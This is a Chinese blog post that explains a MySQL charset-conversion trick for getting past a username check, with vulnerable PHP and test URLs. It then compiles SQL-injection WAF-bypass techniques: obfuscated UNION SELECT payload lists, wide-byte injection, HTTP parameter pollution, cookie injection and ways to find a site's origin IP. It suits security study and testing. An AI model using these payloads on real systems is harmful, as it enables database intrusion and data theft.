MySQL字符集的转换及MySQL绕过的总结

苏雨鱼

已于 2024-08-11 22:55:47 修改

阅读量810

点赞数 22

文章标签：网络 web安全数据库 mysql

于 2024-08-11 20:32:04 首次发布

本文链接：https://blog.csdn.net/m0_52326740/article/details/141110312

版权

mysql字符集的转换

基本配置

<?php
$mysqli = new mysqli("localhost", "root", "root", "security");

/* check connection */
if ($mysqli->connect_errno) {
    printf("Connect failed: %s\n", $mysqli->connect_error);
    exit();
}

$mysqli->query("set names utf8");

$username = addslashes($_GET['username']);


if ($username === 'admin') {
    die('Permission denied!');
}

/* Select queries return a resultset */
$sql = "SELECT * FROM `table1` WHERE username='{$username}'";

if ($result = $mysqli->query( $sql )) {
    printf("Select returned %d rows.\n", $result->num_rows);

    while ($row = $result->fetch_array(MYSQLI_ASSOC))
    {
        var_dump($row);
    }

    /* free result set */
    $result->close();
} else {
    var_dump($mysqli->error);
}

$mysqli->close();

mysql代码

CREATE TABLE `table1` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `username` varchar(255) COLLATE latin1_general_ci NOT NULL,
  `password` varchar(255) COLLATE latin1_general_ci NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=1 DEFAULT CHARSET=latin1 COLLATE=latin1_general_ci;

插入一条数据进去

INSERT `table1` VALUES (1, 'admin', 'admin');

我们看见代码发现光写一个username=admin的话是没有用的必须要进行绕过

所以我想到后面必须要跟一些参数进行绕过，我们发现%c3、%c2是可以继续绕过的

但是为什么这个可以进行绕过呢？这里我们就要先说明一下mysql字符集转换的问题了

Mysql字符集转换

造成这个Trick的根本原因是，Mysql字段的字符集和php mysqli客户端设置的字符集不相同。

set names utf8 的意思是将客户端的字符集设置为utf8。我们打开mysql控制台，依次执行SHOW VARIABLES LIKE 'character_set_%';、set names utf8;、SHOW VARIABLES LIKE 'character_set_%';，即可得到如下结果：

这个latin1是真正的mysql原生字符集，就是适应于英文的字符集

我们发现有几个改变了

client、connection这个涉及到我们自己的电脑，这两个参数改变了

而涉及到mysql服务端的参数database、server没有变化也就是说

如上图，在默认情况下，mysql字符集为latin1，而执行了set names utf8;以后，character_set_client、character_set_connection、character_set_results等与客户端相关的配置字符集都变成了utf8，但character_set_database、character_set_server等服务端相关的字符集还是latin1。

这就是该Trick的核心，因为这一条语句，导致客户端、服务端的字符集出现了差别。既然有差别，Mysql在执行查询的时候，就涉及到字符集的转换。

MySQL Server收到请求时将请求数据从character_set_client转换为character_set_connection；
进行内部操作前将请求数据从character_set_connection转换为内部操作字符集

在我们这个案例中，character_set_client和character_set_connection被设置成了utf8，而内部操作字符集其实也就是username字段的字符集还是默认的latin1。于是，整个操作就有如下字符串转换过程：

utf8 --> utf8 --> latin1

utf8-->utf-8是没有问题的

但是utf-8->latin1的时候就会出现问题了

最后执行比较username='admin'的时候，'admin'是一个latin1字符串

漏洞成因

那么，字符集转换为什么会导致%c2被忽略呢？

个人分析原因应该是，Mysql在转换字符集的时候，将不完整的字符给忽略了。

举个简单的例子，佬这个汉字的UTF-8编码是\xE4\xBD\xAC，我们可以依次尝试访问下面三个URL： b'\xe4\xbd\xac'

http://127.0.0.1/mysql_1.php?username=admin%e4
http://127.0.0.1/mysql_1.php?username=admin%e4%bd
http://127.0.0.1/mysql_1.php?username=admin%e4%bd%ac

汉字转换进去以后呢latin1识别不了，它只能识别英文

可以发现，前两者都能成功获取到username=admin的结果，而最后一个URL，也就是当我输入佬字完整的编码时，将会被抛出一个错误：

为什么会抛出错误？原因很简单，因为latin1并不支持汉字，所以utf8汉字转换成latin1时就抛出了错误。

那前两次为什么没有抛出错误？因为前两次输入的编码并不完整，Mysql在进行编码转换时，就将其忽略了。

这个特点也导致，我们查询username=admin%e4时，%e4被省略，最后查出了username=admin的结果。

为什么只有部分字符可以使用

测试这个Trick的时候发现，username=admin%c2时可以正确得到结果，但username=admin%c1就不行，这是为什么？

简单fuzz了一下，如果在admin后面加上一个字符，有如下结果：

\x00~\x7F：返回空白结果 \x80~\xC1：返回错误Illegal mix of collations \xC2~\xEF：返回admin的结果 \xF0~\xFF：返回错误Illegal mix of collations 这就涉及到Mysql编码相关的知识了，先看看维基百科吧。

UTF-8编码是变长编码，可能有1~4个字节表示：

一字节时范围是[00-7F]

两字节时范围是C0-DF

三字节时范围是E0-EF[80-BF]

四字节时范围是F0-F7 80-BF

然后根据RFC 3629规范，又有一些字节值是不允许出现在UTF-8编码中的：

所以最终，UTF-8第一字节的取值范围是：00-7F、C2-F4，这也是我在admin后面加上80-C1、F5-FF等字符时会抛出错误的原因。

Mysql UTF8 特性

但是问题为什么我用F1-F4还是不能成功呢？

原因：是因为Mysql的utf8其实是阉割版utf-8编码，Mysql中的utf8字符集最长只支持三个字节，

所以，我们回看前文列出的UTF-8编码第一字节的范围

三字节时范围是E0-EF[80-BF]

四字节时范围是F0-F7 80-BF

F0-F4是四字节才有的，所以我传入username=admin%F0也将抛出错误。

如果你需要Mysql支持四字节的utf-8，可以使用utf8mb4编码。我将原始代码中的set names改成set names utf8mb4，再看看效果

MySQL绕过

输入内容过滤

空格

通过fuzz或延时来辅助判断

select polygon((select * from (select * from (select @@version) f) x));

(1)两个空格代替一个空格，用Tab代替空格，%a0=空格

%20 %09 %0a %0b %0c %0d %a0 %00 /**/  /*!*/
select/**/1,2       #/*注释*/
/*!select*/1,2      #/*!这里的语句可以执行*/

这个数组不能超过版本号

(2)括号：

在MySQL中，括号是用来包围子查询的。因此，任何可以计算出结果的语句，都可以用括号包围起来。而括号的两端，可以没有多余的空格。

select(user())from dual where(1=1)and(2=2)
?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23

(3)反引号 `` 包住表名

select * from`tb1`;

(4)浮点数：

select * from users where id=8E0union select 1,2,3
select * from users where id=8.0union select 1,2,3

引号

十六进制

select column_name  from information_schema.tables where table_name="users"

select column_name  from information_schema.tables where table_name=0x7573657273

逗号

（1）简单注入可以使用join方法绕过原语句：

union select 1,2,3

join语句：

union select * from (select 1)a join (select 2)b join (select 3)c

（2）对于盲注的那几个函数substr(),mid(),limit substr和mid()可以使用from for的方法解决

substr(str from pos for len)    #在str中从第pos位截取len长的字符
mid(str from pos for len)       #在str中从第pos位截取len长的字符

mid()使用like

select ascii(mid(user(),1,1))=80   #等价于
select user() like 'r%'

limit可以用offset的方法绕过

select * from news limit 1,2
select * from news limit 1 offset 0

比较符号（<>）

（1）greatest(n1,n2,n3,...) //返回其中的最大值（2）strcmp(str1,str2) //当str1=str2，返回0，当str1>str2，返回1，当str1<str2，返回-1 （3）between and //选取介于两个值之间的数据范围。这些值可以是数值、文本或者日期。

使用greatest()、least（）：（前者返回最大值，后者返回最小值）同样是在使用盲注的时候，在使用二分查找的时候需要使用到比较操作符来进行查找。如果无法使用比较操作符，那么就需要使用到greatest来进行绕过了。最常见的一个盲注的sql语句：

select * from users where id=1 and ascii(substr(database(),0,1))>64

此时如果比较操作符被过滤，上面的盲注语句则无法使用,那么就可以使用greatest来代替比较操作符了。greatest(n1,n2,n3,…)函数返回输入参数(n1,n2,n3,…)的最大值。那么上面的这条sql语句可以使用greatest变为如下的子句:

select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64

or and xor not

and=&&  or=||   xor=|   not=!

注释符 # (-- ) (--+)

id=1' union select 1,2,3||'1

等号（=）、关键词（如flag）被过滤

使用like 、rlike 、regexp 或者使用< 或者 >

select * from tb1 where name like'fl%'; # %表示0个或多个字符，_表示1个字符
select * from tb1 where name regexp'{'; #正则
select * from tb1 where name regexp('{');

union，select，where

#WAF Bypassing Strings:

 /*!%55NiOn*/ /*!%53eLEct*/
 %55nion(%53elect 1,2,3)-- -
 +union+distinct+select+
 +union+distinctROW+select+
 /**//*!12345UNION SELECT*//**/
 /**//*!50000UNION SELECT*//**/
 /**/UNION/**//*!50000SELECT*//**/
 /*!50000UniON SeLeCt*/
 union /*!50000%53elect*/
 +#uNiOn+#sEleCt
 +#1q%0AuNiOn all#qa%0A#%0AsEleCt
 /*!%55NiOn*/ /*!%53eLEct*/
 /*!u%6eion*/ /*!se%6cect*/
 +un/**/ion+se/**/lect
 uni%0bon+se%0blect
 %2f**%2funion%2f**%2fselect
 union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
 REVERSE(noinu)+REVERSE(tceles)
 /*--*/union/*--*/select/*--*/
 union (/*!/**/ SeleCT */ 1,2,3)
 /*!union*/+/*!select*/
 union+/*!select*/
 /**/union/**/select/**/
 /**/uNIon/**/sEleCt/**/
 /**//*!union*//**//*!select*//**/
 /*!uNIOn*/ /*!SelECt*/
 +union+distinct+select+
 +union+distinctROW+select+
 +UnIOn%0d%0aSeleCt%0d%0a
 UNION/*&test=1*/SELECT/*&pwn=2*/
 un?+un/**/ion+se/**/lect+
 +UNunionION+SEselectLECT+
 +uni%0bon+se%0blect+
 %252f%252a*/union%252f%252a /select%252f%252a*/
 /%2A%2A/union/%2A%2A/select/%2A%2A/
 %2f**%2funion%2f**%2fselect%2f**%2f
 union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
 /*!UnIoN*/SeLecT+

#Union Select by PASS with Url Encoded Method:

   %55nion(%53elect)
   union%20distinct%20select
   union%20%64istinctRO%57%20select
   union%2053elect
   %23?%0auion%20?%23?%0aselect
   %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
   %55nion %53eLEct
   u%6eion se%6cect
   unio%6e %73elect
   unio%6e%20%64istinc%74%20%73elect
   uni%6fn distinct%52OW s%65lect
   %75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7

（1）使用注释符绕过

常用注释符：

//，-- , /**/, #, --+, -- -, ;,%00,--a

用法：

U/**/ NION /**/ SE/**/ LECT /**/user，pwd from user

（2）使用大小写绕过

id=-1'UnIoN/**/SeLeCT

（3）内联注释绕过

id=-1'/*!UnIoN*/ SeLeCT 1,2,concat(/*!table_name*/) FrOM /*information_schema*/.tables /*!WHERE *//*!TaBlE_ScHeMa*/ like database()#

（4）双关键字绕过（若删除掉第一个匹配的union就能绕过）

id=-1'UNIunionONSeLselectECT1,2,3–-

编码

如URLEncode编码，ASCII,HEX,unicode编码绕过：

or 1=1即%6f%72%20%31%3d%31，而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。

函数

hex()、bin() ==> ascii()
sleep() ==>benchmark()
concat_ws()==>group_concat()
mid()、substr() ==> substring()
@@user ==> user()
@@datadir ==> datadir()

举例：substring()和substr()无法使用时：

?id=1 and ascii(mid(database(),1,1))=115

或者：

substr((select 'password'),1,1) = 0x70
strcmp(left('password',1), 0x69) = 1
strcmp(left('password',1), 0x70) = 0
strcmp(left('password',1), 0x71) = -1

宽字节注入

过滤 ’ 的时候往往利用的思路是将 ’ 转换为 ’ 。在 mysql 中使用 GBK 编码的时候，会认为两个字符为一个汉字，一般有两种思路：（1）%df 吃掉 \ 具体的方法是 urlencode(’) = %5c%27，我们在 %5c%27 前面添加 %df ，形成 %df%5c%27 ，而 mysql 在 GBK 编码方式的时候会将两个字节当做一个汉字，%df%5c 就是一个汉字，%27 作为一个单独的（’）符号在外面：

id=-1%df%27union select 1,user(),3--+

（2）将 ’ 中的 \ 过滤掉，例如可以构造 %**%5c%5c%27 ，后面的 %5c 会被前面的 %5c 注释掉。一般产生宽字节注入的PHP函数： 1.replace（）：过滤 ’ \ ，将 ’ 转化为 ’ ，将 \ 转为 \，将 " 转为 " 。用思路一。 2.addslaches()：返回在预定义字符之前添加反斜杠（\）的字符串。预定义字符：’ , " , \ 。用思路一（防御此漏洞，要将 mysql_query 设置为 binary 的方式） 3.mysql_real_escape_string()：转义下列字符：

\x00     \n     \r     \     '     "     \x1a

（防御，将mysql设置为gbk即可）

多参数请求拆分

对于多个参数拼接到同一条SQL语句中的情况，可以将注入语句分割插入。

例如请求URL时，GET参数格式如下：

a=[input1]&b=[input2]

将GET的参数a和参数b拼接到SQL语句中，SQL语句如下所示。

and a=[input1] and b=[input2]

这时就可以将注入语句进行拆分，如下所示：

a=union/*&b=*/select 1,2,3,4

最终将参数a和参数b拼接，得到的SQL语句如下所示：

and a=union /*and b=*/select 1,2,3,4

HTTP参数污染

HTTP参数污染是指当同一个参数出现多次，不同的中间件会解析为不同的结果。具体如下图所示：（以参数color=red&color=blue为例）。

可见，IIS比较容易利用，可以直接分割带逗号的SQL语句。在其余的中间件中，如果WAF只检测了通参数名中的第一个或最后一个，并且中间件的特性正好取与WAF相反的参数，则可成功绕过。下面以IIS为例，一般的SQL注入语句如下所示：

Inject=union select 1,2,3,4

将SQL注入语句转换为以下格式。

Inject=union/*&inject=*/select/*&inject=*/1&inject=2&inject=3&inject=4

最终在IIS中读取的参数值将如下所示

Inject=union/*, */select/*, */1,2,3,4

生僻函数

使用生僻函数替代常见的函数，例如在报错注入中使用polygon()函数替换常用的updatexml()函数

select polygon((select * from (select * from (select @@version) f) x));

寻找网站源IP

对于具有云WAF防护的网站，只要找到网站的IP地址，通过IP访问网站，就可以绕过云WAF检测。

常见的寻找网站IP的方法由以下几种

寻找网站的历史解析记录
多个不同区域ping网站，查看IP解析的结果
找网站的二级域名、NS、MX记录等对应的IP
订阅网站邮件，查看邮件发送方的IP

注入参数到cookie中

某些程序员在代码中使用$_REQUEST获取参数，而$_REQUEST会依次从GET/POST/cookie中获取参数，如果WAF只检测了GET/POST而没有检测cookie,则可以将注入语句放入cookie中进行绕过。

输出内容过滤

编码

hex() to_base64()

字符替换

replace(str,from_str,to_str)

编码+字符替换

例如：

replace(to_base64(xxx),from_str,to_str) replace多次套用

苏雨鱼

关注

22
点赞
踩
22

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫